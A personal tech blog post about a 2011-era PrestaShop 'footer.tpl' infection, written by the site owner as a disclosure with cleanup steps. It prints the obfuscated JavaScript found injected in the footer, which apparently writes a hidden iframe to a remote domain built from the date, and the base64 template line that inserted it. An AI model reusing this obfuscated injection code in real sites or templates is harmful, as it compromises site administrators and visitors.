HOW GEEK!

geek notes for advice seekers

Prestashop XSS Worm (footer.tpl virus)

Today i woke up and connected to a Prestashop site i’m setting up.
I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines.
I noticed a strange blank line in the footer.. DOH!

When i looked, i had this code in the footer:

<script>String.prototype.asd=function(){return String.fromCharCode;};
Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;}
catch(q){zxc={}[i];}v=document.createTextNode(‘asd’);
var s=””;for(i in v)if(i==’childNodes’)o=v[i].length+1;o*=2;e=eval;
m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o
,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,
34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,
113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,
118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o
,42-o,102-o,48-o,105-o,103-o,118-o,70-o,
99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,
43-o,61-o,34-o,120-o,99-o,116-o,
34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,
104-o,116-o,113-o,111-o,69-o,106-o,
99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o
,103-o,118-o,74-o,113-o,119-o,116-o,
117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o
,119-o,111-o,103-o,112-o,118-o,
48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o
,116-o,99-o,111-o,103-o,34-o,
117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,
49-o,101-o,110-o,107-o,101-o,
109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,
107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,
41-o,34-o,121-o,107-o,102-o,118-o,
106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,
50-o,64-o,36-o,43-o,61-o];
mm=”.asd();for(i=0;i<m.length;i++)s+
=mm(e(“m”+”[“+”i”+”]”));e(s);</script>

And this in footer.tpl was causing it:

{literal}base64_decode(“PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlL
mFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO3
07T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWl
mKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9
W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgc
z0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubG
VuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1
vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0
LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyM
C1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE
2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMt
bywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxM
DItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLD
EwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDg
tbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8s
NDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzL
W8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My
1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbyw
xMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2L
W8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA
1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctby
w0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDEx
My1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4L
W8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLD
YyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC
1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtby
wxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMD
ctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW
8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMT
AtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW
8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLD
EwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1
vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1v
XTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tK
GUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=”){/literal}

Also 2 PHP files were created in the upload/ and download/ folders which had the creation time set to the exact time i entered in the backend this morning!

Apparently, Prestashop.com got compromised and somebody inserted a malicious script, which was executed in any admin’s browser window and that would make him backdoor his own site.

All the infected shops employees’ credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

The fix:
Be sure to delete modules/her.php
Remove the javascript code in the end of your footer.tpl theme files.
Be sure to create these folders:
tools/smarty/compile/
tools/smarty/cache/

Put back the htaccess files of upload/ and download/

You can clear *.php files from upload/ and download/

Clear ALL your cache.
Move your admin folder.
Reset your Mysql Password.
Reset all your employees’ passwords!

The vulnerability has been fixed on prestashop.com.

This shows how including external content (html) is really risky and should be avoided at all cost. External content should always be parsed and displayed safely.

More information on this thread:
http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

http://www.prestashop.com/blog/article/please_read_security_procedure/

, , , , ,

One Response to “Prestashop XSS Worm (footer.tpl virus)”

Leave a Reply

Your email address will not be published. Required fields are marked *